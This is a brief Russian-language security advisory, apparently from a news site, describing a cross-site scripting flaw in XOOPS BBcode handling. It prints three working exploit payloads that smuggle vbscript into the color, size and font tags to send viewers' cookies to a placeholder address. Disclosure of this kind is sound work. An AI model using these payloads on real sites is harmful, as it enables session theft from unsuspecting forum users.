Уязвимость обнаружена в систему управления содержанием XOOPS. Удаленный пользователь может выполнить XSS нападение. 

Удаленный атакующий может внедрить произвольный код сценария в некоторые BBcode тэги, который будет выполнен в браузере пользователя, просматривающего злонамеренное сообщение. Уязвимость может использоваться в модулях - Private Messages, News и NewBB (forum). 

Эксплоит: 

[color=FFFFFF;background:url (vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+
Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/color]

[size=10;background:url (vbscript:location.replace(Chr(97)+Chr(98)+ Chr(99)+Chr(100)+
Chr(101)+Chr(102)+document.cookie))]a[/size]

[font=Verdana;background:url (vbscript:location.replace(Chr(97)+ Chr(98)+Chr(99)+
Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/font]

Уязвимость обнаружена в XOOPS 1.3.x-2.0.x.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии